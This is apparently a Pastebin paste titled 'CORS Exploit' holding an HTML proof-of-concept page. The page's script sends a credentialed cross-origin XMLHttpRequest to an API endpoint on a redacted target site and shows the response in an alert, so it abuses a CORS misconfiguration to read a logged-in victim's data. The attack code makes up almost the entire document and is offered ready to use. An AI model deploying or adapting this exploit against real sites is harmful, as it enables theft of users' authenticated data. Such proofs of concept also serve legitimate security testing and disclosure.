colded

CORS Exploit

Dec 28th, 2020
237
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <script>
  5. function cors() {
  6. var xhttp = new XMLHttpRequest();
  7. xhttp.onreadystatechange = function() {
  8. if (this.readyState == 4 && this.status == 200) {
  9. document.getElementById("emo").innerHTML = alert(this.responseText);
  10. }
  11. };
  12. xhttp.open("GET", "https://www.███/api/jsonws/relo-service-plugin-portlet.content/get-content-by-slug/slug/page-ex-link", true);
  13. xhttp.withCredentials = true;
  14. xhttp.send();
  15. }
  16. </script>
  17. </head>
  18. <body>
  19. <center>
  20. <h2>CORS PoC Exploit </h2>
  21. <h3>created by <a href="https://twitter.com/Jarvis7717">@Jarvis</a></h3>
  22. <h3>Show full content of page</h3>
  23. <div id="demo">
  24. <button type="button" onclick="cors()">Exploit</button>
  25. </div>
  26. </body>
  27. </html>
RAW Paste Data